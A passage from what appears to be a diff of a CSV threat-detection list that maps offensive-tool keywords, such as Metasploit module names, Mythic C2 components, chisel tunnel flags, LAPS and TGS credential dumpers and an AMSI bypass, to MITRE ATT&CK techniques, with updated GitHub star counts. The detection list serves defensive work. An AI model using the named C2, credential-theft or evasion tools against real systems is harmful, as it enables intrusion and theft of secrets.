Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" "*mysql -u* -p c2 < c2_sample.sql*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" -"*mysql_authbypass_hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*mysql_file_enum.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*mysql_hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*mysql_authbypass_hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mysql_file_enum.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mysql_hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*mysql-privesc-race.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*Mystikal-main*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" -"*mythic_c2_container*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*mythic_nginx*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*mythic_payloadtype*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*mythic_payloadtype*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*mythic_payloadtype_container*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*mythic_rest.Payload*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*mythic_service.py*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*mythic_translator_containter*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*mythic_c2_container*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_nginx*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_payloadtype*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_payloadtype*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_payloadtype_container*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_rest.Payload*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_service.py*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_translator_containter*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*MythicAgents/Apollo*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*MythicAgents/Athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*MythicAgents/merlin*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*MythicAgents/Athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*MythicAgents/merlin*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" "*MythicAgents/tetanus*","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://github.com/MythicAgents/tetanus","1","1","N/A","N/A","3","229","33","2023-05-14T21:34:20Z","2022-03-07T20:35:33Z" -"*mythic-cli *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*mythic-cli*athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*MythicClient.cs*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*mythic-docker*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*mythic-cli *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic-cli*athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*MythicClient.cs*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*mythic-docker*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*MzHmO/DebugAmsi*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*MzHmO/Privileger*","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","117","25","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" "*MzHmO/TGSThief*","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","129","18","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" "*n00py/LAPSDumper*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "*n00py/Slackor*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"*n0de.exe*elevationstation*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*n0de.exe*elevationstation*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*n1k7l4i/goMatrixC2*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z" "*n1k7l4i/goZulipC2*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" "*n1nj4sec*","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/n1nj4sec","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nac_bypass*","offensive_tool_keyword","nac_bypass","nac bypass - The basic requirement for an NAC bypass is access to a device that has already been authenticated. This device is used to log into the network and then smuggle in network packages from a different device. This involves placing the attackers system between the network switch and the authenticated device. One way to do this is with a Raspberry Pi and two network adapters","T1550.002 - T1078 - T1133 - T1040 - T1550","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Defense Evasion","https://github.com/scipag/nac_bypass","1","1","N/A","N/A","3","229","62","2023-08-02T09:09:19Z","2019-01-03T06:55:00Z" "*nagios-root-privesc.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*--name chisel -p *","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*named_pipes.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*--name chisel -p *","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*named_pipes.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*NamedPipeImpersonation.cs*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*NamedPipeImpersonation.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*NamedPipeServer.ps1*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" -"*namespace CredPhisher*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*namespace RedPersist.Persist*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*namespace CredPhisher*","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*namespace RedPersist.Persist*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" "*namespace WheresMyImplant*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*namp *--script *","offensive_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source 